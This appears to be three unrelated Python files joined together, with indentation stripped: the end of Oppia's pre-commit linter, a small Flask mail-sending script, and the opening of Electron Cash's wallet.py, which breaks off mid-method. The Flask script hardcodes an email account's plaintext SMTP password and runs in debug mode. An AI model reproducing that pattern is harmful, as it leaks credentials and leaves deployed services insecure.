python_utils.PRINT('Starting docstring checks')
python_utils.PRINT('----------------------------------------')
summary_messages = []
files_to_check = [
filepath for filepath in self.py_filepaths if not
any(fnmatch.fnmatch(filepath, pattern) for pattern in
EXCLUDED_PATHS)]
missing_period_message = (
'There should be a period at the end of the docstring.')
multiline_docstring_message = (
'Multiline docstring should end with a new line.')
single_line_docstring_message = (
'Single line docstring should not span two lines. '
'If line length exceeds 80 characters, '
'convert the single line docstring to a multiline docstring.')
previous_line_message = (
'There should not be any empty lines before the end of '
'the multi-line docstring.')
space_after_triple_quotes_in_docstring_message = (
'There should be no space after """ in docstring.')
failed = False
is_docstring = False
is_class_or_function = False
stdout = python_utils.string_io()
with _redirect_stdout(stdout):
for filepath in files_to_check:
file_content = FILE_CACHE.readlines(filepath)
file_length = len(file_content)
for line_num in python_utils.RANGE(file_length):
line = file_content[line_num].strip()
prev_line = ''
if line_num > 0:
prev_line = file_content[line_num - 1].strip()
# Check if it is a docstring and not some multi-line string.
if (prev_line.startswith('class ') or
prev_line.startswith('def ')) or (
is_class_or_function):
is_class_or_function = True
if prev_line.endswith('):') and (
line.startswith('"""')):
is_docstring = True
is_class_or_function = False
# Check for space after """ in docstring.
if re.match(r'^""".+$', line) and is_docstring and (
line[3] == ' '):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num + 1,
space_after_triple_quotes_in_docstring_message))
python_utils.PRINT('')
is_docstring = False
# Check if single line docstring span two lines.
if line == '"""' and prev_line.startswith('"""') and (
is_docstring):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num, single_line_docstring_message))
python_utils.PRINT('')
is_docstring = False
# Check for single line docstring.
elif re.match(r'^""".+"""$', line) and is_docstring:
# Check for punctuation at line[-4] since last three
# characters are double quotes.
if (len(line) > 6) and (
line[-4] not in
ALLOWED_TERMINATING_PUNCTUATIONS):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num + 1, missing_period_message))
python_utils.PRINT('')
is_docstring = False
# Check for multiline docstring.
elif line.endswith('"""') and is_docstring:
# Case 1: line is """. This is correct for multiline
# docstring.
if line == '"""':
# Check for empty line before the end of docstring.
if prev_line == '':
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num, previous_line_message))
python_utils.PRINT('')
# Check for punctuation at end of docstring.
else:
last_char_is_invalid = prev_line[-1] not in (
ALLOWED_TERMINATING_PUNCTUATIONS)
no_word_is_present_in_excluded_phrases = (
not any(
word in prev_line for word in(
EXCLUDED_PHRASES)))
if last_char_is_invalid and (
no_word_is_present_in_excluded_phrases):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num,
missing_period_message))
python_utils.PRINT('')
# Case 2: line contains some words before """. """
# should shift to next line.
elif not any(word in line for word in EXCLUDED_PHRASES):
failed = True
python_utils.PRINT('%s --> Line %s: %s' % (
filepath, line_num + 1,
multiline_docstring_message))
python_utils.PRINT('')
is_docstring = False
docstring_checker = docstrings_checker.ASTDocStringChecker()
for filepath in files_to_check:
ast_file = ast.walk(
ast.parse(
python_utils.convert_to_bytes(
FILE_CACHE.read(filepath))))
func_defs = [n for n in ast_file if isinstance(
n, ast.FunctionDef)]
for func in func_defs:
# Check that the args in the docstring are listed in the
# same order as they appear in the function definition.
func_result = docstring_checker.check_docstrings_arg_order(
func)
for error_line in func_result:
python_utils.PRINT('%s --> Func %s: %s' % (
filepath, func.name, error_line))
python_utils.PRINT('')
failed = True
python_utils.PRINT('')
if failed:
summary_message = (
'%s Docstring check failed, see files above with bad'
'docstrings to be fixed.' % _MESSAGE_TYPE_FAILED)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = (
'%s Docstring check passed' % _MESSAGE_TYPE_SUCCESS)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
self.process_manager['docstrings'] = summary_messages
_STDOUT_LIST.append(stdout)
def _check_html_tags_and_attributes(self, debug=False):
"""This function checks the indentation of lines in HTML files."""
if self.verbose_mode_enabled:
python_utils.PRINT('Starting HTML tag and attribute check')
python_utils.PRINT('----------------------------------------')
html_files_to_lint = self.html_filepaths
failed = False
summary_messages = []
with _redirect_stdout(_TARGET_STDOUT):
for filepath in html_files_to_lint:
file_content = FILE_CACHE.read(filepath)
file_lines = FILE_CACHE.readlines(filepath)
parser = CustomHTMLParser(filepath, file_lines, debug)
parser.feed(file_content)
if len(parser.tag_stack) != 0:
raise TagMismatchException('Error in file %s\n' % filepath)
if parser.failed:
failed = True
if failed:
summary_message = (
'%s HTML tag and attribute check failed, fix the HTML '
'files listed above.' % _MESSAGE_TYPE_FAILED)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
else:
summary_message = '%s HTML tag and attribute check passed' % (
_MESSAGE_TYPE_SUCCESS)
python_utils.PRINT(summary_message)
summary_messages.append(summary_message)
python_utils.PRINT('')
return summary_messages
def _lint_html_files(self):
"""This function is used to check HTML files for linting errors."""
parent_dir = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
node_path = os.path.join(
parent_dir, 'oppia_tools', 'node-10.15.3', 'bin', 'node')
htmllint_path = os.path.join(
'node_modules', 'htmllint-cli', 'bin', 'cli.js')
error_summary = []
total_error_count = 0
summary_messages = []
htmllint_cmd_args = [node_path, htmllint_path, '--rc=.htmllintrc']
html_files_to_lint = self.html_filepaths
if self.verbose_mode_enabled:
python_utils.PRINT('Starting HTML linter...')
python_utils.PRINT('----------------------------------------')
python_utils.PRINT('')
if not self.verbose_mode_enabled:
python_utils.PRINT('Linting HTML files.')
for filepath in html_files_to_lint:
proc_args = htmllint_cmd_args + [filepath]
if self.verbose_mode_enabled:
python_utils.PRINT('Linting %s file' % filepath)
with _redirect_stdout(_TARGET_STDOUT):
proc = subprocess.Popen(
proc_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
encoded_linter_stdout, _ = proc.communicate()
linter_stdout = encoded_linter_stdout.decode(encoding='utf-8')
# This line splits the output of the linter and extracts digits
# from it. The digits are stored in a list. The second last
# digit in the list represents the number of errors in the file.
error_count = (
[int(s) for s in linter_stdout.split() if s.isdigit()][-2])
if error_count:
error_summary.append(error_count)
python_utils.PRINT(linter_stdout)
with _redirect_stdout(_TARGET_STDOUT):
if self.verbose_mode_enabled:
python_utils.PRINT('----------------------------------------')
for error_count in error_summary:
total_error_count += error_count
total_files_checked = len(html_files_to_lint)
if total_error_count:
python_utils.PRINT('(%s files checked, %s errors found)' % (
total_files_checked, total_error_count))
summary_message = (
'%s HTML linting failed, '
'fix the HTML files listed above.' % _MESSAGE_TYPE_FAILED)
summary_messages.append(summary_message)
else:
summary_message = '%s HTML linting passed' % (
_MESSAGE_TYPE_SUCCESS)
summary_messages.append(summary_message)
python_utils.PRINT('')
python_utils.PRINT(summary_message)
python_utils.PRINT('HTML linting finished.')
python_utils.PRINT('')
return summary_messages
def perform_all_lint_checks(self):
"""Perform all the lint checks and returns the messages returned by all
the checks.
Returns:
all_messages: str. All the messages returned by the lint checks.
"""
common_messages = super(
OtherLintChecksManager, self).perform_all_lint_checks()
# division_operator_messages = self._check_division_operator()
# import_order_messages = self._check_import_order()
self._check_import()
self._check_docstring()
docstring_messages = self.process_manager['docstrings']
# The html tags and attributes check has an additional
# debug mode which when enabled prints the tag_stack for each file.
html_tag_and_attribute_messages = (
self._check_html_tags_and_attributes())
html_linter_messages = self._lint_html_files()
import_order_messages = self.process_manager['import']
all_messages = (
import_order_messages + common_messages +
docstring_messages + html_tag_and_attribute_messages +
html_linter_messages)
return all_messages
def _print_complete_summary_of_errors():
"""Print complete summary of errors."""
error_messages = _TARGET_STDOUT.getvalue()
piped_messages = ''.join([x.getvalue() for x in _STDOUT_LIST])
error_messages += piped_messages
if error_messages != '':
python_utils.PRINT('Summary of Errors:')
python_utils.PRINT('----------------------------------------')
python_utils.PRINT(error_messages)
def read_files(file_paths):
"""Read all files to be checked and cache them. This will spin off multiple
threads to increase the efficiency.
"""
threads = []
for file_path in file_paths:
thread = threading.Thread(target=FILE_CACHE.read, args=(file_path,))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def categorize_files(file_paths):
"""Categorize all the files and store them in shared variable _FILES."""
all_filepaths_dict = {
'.py': [], '.html': [], '.ts': [], '.js': [], 'other': [], '.css': []
}
for file_path in file_paths:
_, extension = os.path.splitext(file_path)
if extension in all_filepaths_dict:
all_filepaths_dict[extension].append(file_path)
else:
all_filepaths_dict['other'].append(file_path)
_FILES.update(all_filepaths_dict)
def _join_linting_process(linting_processes, result_queues, result_stdouts):
"""Join process spawn off by _lint_all_files and capture the outputs."""
for process in linting_processes:
process.join()
summary_messages = []
for result_queue in result_queues:
while not result_queue.empty():
summary_messages.append(result_queue.get())
for result_stdout in result_stdouts:
while not result_stdout.empty():
summary_messages.append(result_stdout.get())
with _redirect_stdout(_TARGET_STDOUT):
python_utils.PRINT(b'\n'.join(summary_messages))
python_utils.PRINT('')
python_utils.PRINT('')
return summary_messages
def main(args=None):
"""Main method for pre commit linter script that lints Python, JavaScript,
HTML, and CSS files.
"""
parsed_args = _PARSER.parse_args(args=args)
# Default mode is non-verbose mode, if arguments contains --verbose flag it
# will be made True, which will represent verbose mode.
verbose_mode_enabled = bool(parsed_args.verbose)
all_filepaths = _get_all_filepaths(parsed_args.path, parsed_args.files)
if len(all_filepaths) == 0:
python_utils.PRINT('---------------------------')
python_utils.PRINT('No files to check.')
python_utils.PRINT('---------------------------')
return
read_files(all_filepaths)
categorize_files(all_filepaths)
linting_processes, result_queues, result_stdout = _lint_all_files(
_FILES['.js'], _FILES['.ts'], _FILES['.py'], _FILES['.html'],
_FILES['.css'], verbose_mode_enabled)
code_owner_message = _check_codeowner_file(verbose_mode_enabled)
# Pylint requires to provide paramter "this_bases" and "d", guess due to
# meta class.
js_ts_lint_checks_manager = JsTsLintChecksManager( # pylint: disable=no-value-for-parameter
verbose_mode_enabled)
other_lint_checks_manager = OtherLintChecksManager( # pylint: disable=no-value-for-parameter
verbose_mode_enabled)
all_messages = code_owner_message
js_message = js_ts_lint_checks_manager.perform_all_lint_checks()
other_messages = other_lint_checks_manager.perform_all_lint_checks()
all_messages += js_message + other_messages
all_messages += _join_linting_process(
linting_processes, result_queues, result_stdout)
_print_complete_summary_of_errors()
if any([message.startswith(_MESSAGE_TYPE_FAILED) for message in
all_messages]):
python_utils.PRINT('---------------------------')
python_utils.PRINT('Checks Not Passed.')
python_utils.PRINT('---------------------------')
sys.exit(1)
else:
python_utils.PRINT('---------------------------')
python_utils.PRINT('All Checks Passed.')
python_utils.PRINT('---------------------------')
NAME_SPACE = multiprocessing.Manager().Namespace()
PROCESSES = multiprocessing.Manager().dict()
NAME_SPACE.files = FileCache()
FILE_CACHE = NAME_SPACE.files
if __name__ == '__main__':
main()
|
flask_send_mail.py
|
# -*- coding:utf-8 -*-
from flask import Flask, render_template
from flask_mail import Mail, Message
from threading import Thread # 线程
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
app = Flask(__name__)
# 配置邮件:服务器/端口/安全套接字层/邮箱名/授权码
app.config['MAIL_SERVER'] = "smtp.163.com"
app.config['MAIL_PORT'] = 465
app.config['MAIL_USE_SSL'] = True
app.config['MAIL_USERNAME'] = 'zhangqianjuns@163.com'
app.config['MAIL_PASSWORD'] = "qwer1234"
app.config['MAIL_DEFAULT_SENDER'] = 'FlaskAdmin<zhangqianjuns@163.com>'
# 关联应用 初始化邮件对象
mail = Mail(app)
@app.route('/')
def index():
return render_template('flask_send_email.html')
@app.route('/mail')
def send_mail():
msg = Message(subject='邮件主题', recipients=['zhangqianjuns@163.com'])
msg.body = 'msg的body'
msg.html = '<h1>哈哈哈哈哈哈</h1>'
t = Thread(target=asyn_send_email, args=(msg, ))
t.start()
return '发送成功'
def asyn_send_email(msg):
try:
with app.app_context():
mail.send(msg)
except Exception as e:
print e
return '发送失败'
if __name__ == '__main__':
app.run(debug=True)
|
wallet.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import os
import queue
import random
import time
import threading
from collections import defaultdict
from functools import partial
import itertools
from .i18n import ngettext
from .util import NotEnoughFunds, ExcessiveFee, PrintError, UserCancelled, profiler, format_satoshis, format_time, finalization_print_error, to_string
from .address import Address, Script, ScriptOutput, PublicKey, OpCodes
from .bitcoin import *
from .version import *
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import networks
from . import keystore
from .storage import multisig_type, WalletStorage
from . import transaction
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
def _(message): return message
TX_STATUS = [
_('Unconfirmed parent'),
_('Low fee'),
_('Unconfirmed'),
_('Not Verified'),
]
del _
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def relayfee(network):
RELAY_FEE = 5000
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else RELAY_FEE
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change < dust threshold is added to the tx fee
#return 182 * 3 * relayfee(network) / 1000 # original Electrum logic
#return 1 # <-- was this value until late Sept. 2018
return 546 # hard-coded Bitcoin Cash dust threshold. Was changed to this as of Sept. 2018
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history chages). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Adddress objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore in enumerate(keystores):
if i == 0 and isinstance(keystore, Deterministic_KeyStore) and not keystore.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore, Old_KeyStore):
keystore.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
keystore.seed_type = 'electrum'
updated_st = True
elif typ == 'bip39':
keystore.seed_type = 'bip39'
updated_st = True
saved_der = keystore_derivations[i]
der = (keystore.has_derivation() and keystore.derivation) or None
if der != saved_der:
if der:
# keystore had a derivation, but top-level storage did not
# (this branch is typically taken on first run after
# restoring from seed or creating a new wallet)
keystore_derivations[i] = saved_der = der
updated = True
elif saved_der:
# we had a derivation but keystore did not. This branch is
# taken if the user has loaded this wallet with an older
# version of Electron Cash. Attempt to restore their
# derivation item in keystore.
keystore.derivation = der # write to keystore
updated_ks = True # tell it to re-save
if updated:
self.print_error("Updated keystore_derivations")
self.storage.put('keystore_derivations', keystore_derivations)
if updated_ks or updated_st:
if updated_ks:
self.print_error("Updated keystore (lost derivations restored)")
if updated_st:
self.print_error("Updated keystore (lost seed_type restored)")
self.save_keystore()
if any((updated, updated_ks, updated_st)):
self.storage.write()
@profiler
def load_transactions(self):
txi = self.storage.get('txi', {})
self.txi = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txi.items()
# skip empty entries to save memory and disk space
if value}
txo = self.storage.get('txo', {})
self.txo = {tx_hash: self.to_Address_dict(value)
for tx_hash, value in txo.items()
# skip empty entries to save memory and disk space
if value}
self.tx_fees = self.storage.get('tx_fees', {})
self.pruned_txo = self.storage.get('pruned_txo', {})
self.pruned_txo_values = set(self.pruned_txo.values())
tx_list = self.storage.get('transactions', {})
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if not self.txi.get(tx_hash) and not self.txo.get(tx_hash) and (tx_hash not in self.pruned_txo_values):
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
self.cashacct.remove_transaction_hook(tx_hash)
self.slp.rm_tx(tx_hash)
@profiler
def save_transactions(self, write=False):
with self.lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
txi = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txi.items()
# skip empty entries to save memory and disk space
if value}
txo = {tx_hash: self.from_Address_dict(value)
for tx_hash, value in self.txo.items()
# skip empty entries to save memory and disk space
if value}
self.storage.put('txi', txi)
self.storage.put('txo', txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('pruned_txo', self.pruned_txo)
history = self.from_Address_dict(self._history)
self.storage.put('addr_history', history)
self.slp.save()
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
self.cashacct.save()
if write:
self.storage.write()
def save_change_reservations(self):
with self.lock:
self.storage.put('change_reserved_default', [a.to_storage_string() for a in self.change_reserved_default])
self.storage.put('change_reserved', [a.to_storage_string() for a in self.change_reserved])
unreserved = self.change_unreserved + list(self.change_reserved_tmp)
self.storage.put('change_unreserved', [a.to_storage_string() for a in unreserved])
def clear_history(self):
with self.lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.pruned_txo = {}
self.pruned_txo_values = set()
self.slp.clear()
self.save_transactions()
self._addr_bal_cache = {}
self._history = {}
self.tx_addr_hist = defaultdict(set)
self.cashacct.on_clear_history()
@profiler
def build_reverse_history(self):
self.tx_addr_hist = defaultdict(set)
for addr, hist in self._history.items():
for tx_hash, h in hist:
self.tx_addr_hist[tx_hash].add(addr)
@profiler
def check_history(self):
save = False
my_addrs = [addr for addr in self._history if self.is_mine(addr)]
for addr in set(self._history) - set(my_addrs):
self._history.pop(addr)
save = True
for addr in my_addrs:
hist = self._history[addr]
for tx_hash, tx_height in hist:
if tx_hash in self.pruned_txo_values or self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx)
save = True
if save:
self.save_transactions()
self.cashacct.save()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
addr_dict = {
'receiving': [addr.to_storage_string()
for addr in self.receiving_addresses],
'change': [addr.to_storage_string()
for addr in self.change_addresses],
}
self.storage.put('addresses', addr_dict)
def load_addresses(self):
d = self.storage.get('addresses', {})
if not isinstance(d, dict):
d = {}
self.receiving_addresses = Address.from_strings(d.get('receiving', []))
self.change_addresses = Address.from_strings(d.get('change', []))
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_transactions()
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx()
self.storage.write()
def is_up_to_date(self):
with self.lock: return self.up_to_date
def is_fully_settled_down(self):
''' Returns True iff the wallet is up to date and its synchronizer
and verifier aren't busy doing work, and its pruned_txo_values list
is currently empty. This is used as a final check by the Qt GUI
to decide if it should do a final refresh of all tabs in some cases.'''
with self.lock:
ret = self.up_to_date
if ret and self.verifier:
ret = self.verifier.is_up_to_date()
if ret and self.synchronizer:
ret = self.synchronizer.is_up_to_date()
ret = ret and not self.pruned_txo_values
return bool(ret)
def set_label(self, name, text = None):
with self.lock:
if isinstance(name, Address):
name = name.to_storage_string()
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def invalidate_address_set_cache(self):
''' This should be called from functions that add/remove addresses
from the wallet to ensure the address set caches are empty, in
particular from ImportedWallets which may add/delete addresses
thus the length check in is_mine() may not be accurate.
Deterministic wallets can neglect to call this function since their
address sets only grow and never shrink and thus the length check
of is_mine below is sufficient.'''
self._recv_address_set_cached, self._change_address_set_cached = frozenset(), frozenset()
def is_mine(self, address):
''' Note this method assumes that the entire address set is
composed of self.get_change_addresses() + self.get_receiving_addresses().
In subclasses, if that is not the case -- REIMPLEMENT this method! '''
assert not isinstance(address, str)
# assumption here is get_receiving_addresses and get_change_addresses
# are cheap constant-time operations returning a list reference.
# If that is not the case -- reimplement this function.
ra, ca = self.get_receiving_addresses(), self.get_change_addresses()
# Detect if sets changed (addresses added/removed).
# Note the functions that add/remove addresses should invalidate this
# cache using invalidate_address_set_cache() above.
if len(ra) != len(self._recv_address_set_cached):
# re-create cache if lengths don't match
self._recv_address_set_cached = frozenset(ra)
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
self._change_address_set_cached = frozenset(ca)
# Do a 2 x O(logN) lookup using sets rather than 2 x O(N) lookups
# if we were to use the address lists (this was the previous way).
# For small wallets it doesn't matter -- but for wallets with 5k or 10k
# addresses, it starts to add up siince is_mine() is called frequently
# especially while downloading address history.
return (address in self._recv_address_set_cached
or address in self._change_address_set_cached)
def is_change(self, address):
assert not isinstance(address, str)
ca = self.get_change_addresses()
if len(ca) != len(self._change_address_set_cached):
# re-create cache if lengths don't match
